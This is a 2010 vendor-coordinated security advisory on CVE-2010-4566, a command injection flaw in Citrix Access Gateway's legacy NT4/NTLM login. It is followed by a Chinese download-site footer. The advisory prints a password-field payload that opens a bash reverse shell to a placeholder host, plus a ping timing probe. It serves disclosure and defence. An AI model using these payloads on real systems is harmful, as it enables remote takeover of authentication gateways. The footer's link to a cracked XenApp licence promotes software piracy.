- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Citrix Access Gateway Command Injection Vulnerability
Release Date: 2010-12-21
Application: Citrix Access Gateway
Versions: Access Gateway Enterprise Edition (up to 9.2-49.8)
Access Gateway Standard & Advanced Edition (prior to 5.0)
Severity: High
Author: George D. Gal <ggal (at) vsecurity (dot) com>
Vendor Status: Updated Software Released, NT4 Authentication Removed [2]
CVE Candidate: CVE-2010-4566
Reference: http://www.vsecurity.com/resources/advisory/20101221-1/
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Description
- -------------------
- From [1]:
"Citrix(R) Access Gateway(TM) is a secure application access solution that
provides administrators granular application-level control while
empowering users with remote access from anywhere. It gives IT
administrators a single point to manage access control and limit actions
within sessions based on both user identity and the endpoint device,
providing better application security, data protection, and compliance
management."
Vulnerability Overview
- ----------------------
On August 2nd, VSR identified a vulnerability in Citrix Access Gateway within
the way user authentication credentials are handled. Under certain
configuration settings it appears that user credentials are passed as
arguments to a command line program to authenticate the user. A lack of data
validation and the mechanism in which the external program is spawned results
in the potential for command injection and arbitrary command execution on the
Access Gateway.
Vulnerability Details
- ---------------------
The Citrix Access Gateway provides support for multiple authentication types.
When utilizing the external legacy NTLM authentication module known as
ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
line utility to verify a user's identity and password. By embedding shell
metacharacters in the web authentication form it is possible to execute
arbitrary commands on the Access Gateway.
The following commands are executed by the ntlm_authenticator during this
process:
vpnadmin 10130 0.0 0.0 2104 976 ? S 15:02 0:00 sh -c /usr/local/samba/bin/samedit -c 'samuser username -a' -U <<username>>%<<password>> -p 139 -S xxx.xxx.xxx.xxx > /tmp/samedit-samuser-stdout.50474096 2> /dev/null
vpnadmin 10131 0.0 0.1 3852 1528 ? S 15:02 0:00 /usr/local/samba/bin/samedit -c samuser username -a -U <<username>>%XXXXXXXX -p 139 -S xxx.xxx.xxx.xxx
By submitting a password value as shown below, it is possible to establish a
reverse shell to a netcat listener:
| bash -i >& /dev/tcp/<<HOST>>/<<PORT>> 0>&1 &
Using a simple ping command in the password field an attacker could use timing
attacks to verify the presence of the vulnerability:
| ping -c 10 <<HOST>>
The ping command above will attempt to send 10 ICMP echo requests to the
target host, resulting in a noticable delay easily detected by vulnerability
scanners.
Versions Affected
- -----------------
Testing was performed against a Citrix Access Gateway 2000 version 4.5.7.
According to the vendor this vulnerability affects all versions of Access
Gateway Enterprise Edition up to version 9.2-49.8, and all versions of
the Access Gateway Standard and Advanced Editions prior to Access Gateway
5.0.
Vendor Response
- ---------------
The following timeline details the vendor's response to the reported issue:
2010-08-06 Citrix was provided a draft advisory.
2010-08-10 Citrix acknowledged receipt of draft advisory.
2010-08-16 VSR follow-up to determine confirmation of issue.
2010-08-16 Citrix confirmed issue.
2010-09-14 VSR follow-up to determine status of issue.
2010-09-29 VSR follow-up to determine status of issue.
2010-09-30 Citrix confirmed continued investigation of the issue.
2010-10-19 VSR follow-up to determine status of issue.
2010-10-26 Citrix verified issue only exists in NT4 authentication feature.
2010-12-01 VSR follow-up to determine status of issue.
2010-12-02 Citrix confirmed December 14th release of security bulletin.
2010-12-14 Citrix releases security bulletin.
2010-12-20 CVE assigned
2010-12-21 VSR releases advisory.
The Citrix advisory may be obtained at:
http://support.citrix.com/article/CTX127613
Recommendation
- --------------
Citrix has indicated that this vulnerability only affects legacy NT4
authentication which has been removed from the latest release of the
device firmware.
Common Vulnerabilities and Exposures (CVE) Information
- ------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2010-4566 to this issue. This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.
Acknowledgements
- ----------------
VSR would like to thank Citrix for the coordinated release of this advisory.
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
References:
1. Citrix Access Gateway
http://citrix.com/accessgateway/overview
2. Citrix Access Gateway - Vendor Security Bulletin
http://support.citrix.com/article/CTX127613
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
This advisory is distributed for educational purposes only with the sincere
hope that it will help promote public safety. This advisory comes with
absolutely NO WARRANTY; not even the implied warranty of merchantability or
fitness for a particular purpose. Virtual Security Research, LLC nor the
author accepts any liability for any direct, indirect, or consequential loss
or damage arising from use of, or reliance on, this information.
See the VSR disclosure policy for more information on our responsible
disclosure practices:
http://www.vsecurity.com/company/disclosure
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
分享到:
相关推荐
Citrix Access Gateway 产品概述.pdf
Citrix Secure Gateway部署手册.pdf
citrix_XenApp_6.5_command_SDK_参考手册(2)
网盘文件永久链接 目录 ...citrix-gateway-13.1-en CitrixReceiver NSVPX-ESX-13.1-42.47_nc_64 PVS_7.0 XA6.5_2008R2 XenApp_and_XenDesktop7_5 XenDesktop5.6 XenDesktop7 XenServer-6.2-install-cd
Citrix Gateway VPX for ESXi NSVPX-ESX-13.1-21.50_nc_64
Citrix 客户端 中文版 10.100.55836 适合看不懂的英文的用户使用
将策略应用于除基于 Access Gateway 的连接之外的每个连接 74 使用多个策略 74 将 Citrix 策略与 Active Directory 配合使用 74 设定策略的优先级和创建例外情况 75 设置策略优先级和创建例外的过程示例 75 显示所有...
作为Citrix Access Suite接入套件的基础,Citrix Presentation Server是应用最广泛的演示服务器。它用于集中部署和管理几乎所有应用程序,且所有授权用户都能随时随地使用任何设备透过任何网络连接方式访问企业应用...
在以前称为NetScaler ADC的Citrix应用交付控制器(ADC)和以前称为NetScaler Gateway的Citrix Gateway中,已发现一个漏洞,如果利用该漏洞,则可能允许未经身份验证的攻击者执行任意代码执行。 编辑:来自Fireeye...
Citrix提供了一个官方的工具来卸载其客户端,该工具称为"Citrix Receiver Clean-Up Utility"(Citrix Receiver清理工具)。这个工具可以完全卸载Citrix Receiver或Citrix Workspace应用程序,并清除与其相关的文件和...
Citrix Access Suite™是一种安全的端到端按需接入系统,让用户从任何地方都能按需访问企业资源。这个强大的解决方案包含思杰公司的接入产品和技术,提供接入的安全性、用户的移动性和应用部署的及时性。
citrix receiver for mac
如何使用Citrix进行工作 用户如何使用Citrix提供的服务以进行工作: 以张三为例: 用户在IE浏览器内,输入Citrix 服务器的IP168.5.128.68,用户第一次登陆,Citrix会让用户下载安装Citrix客户端软件..
citrix_XenApp_6.5_command_SDK_参考手册(1)
删除 Citrix Receiver for Windows 您可以使用 Windows 的“程序和功能”实用工具(添加/删除程序)卸载 Receiver。 注意:如果曾使用 Citrix Receiver Updater 安装 Receiver,请勿使用此方法。 在某些情况下,卸载...
citrix4.0安装手册,citrix4.0部署
citrix客户端配置演示citrix客户端配置演示
Citrix CITRIX PS 4.5 安装说明 北京四通电子技术有限公司 选择正确的安装盘(CPS4.5 只提供Windows2003 Server+SP1 版本,CPS4.0 支持Windows2000 Server) 2. 服务器主机名称更改为 “citrix”(名称区分大小写,...
citrix xenapp 6.5 lic 20 citrix 破解 许可证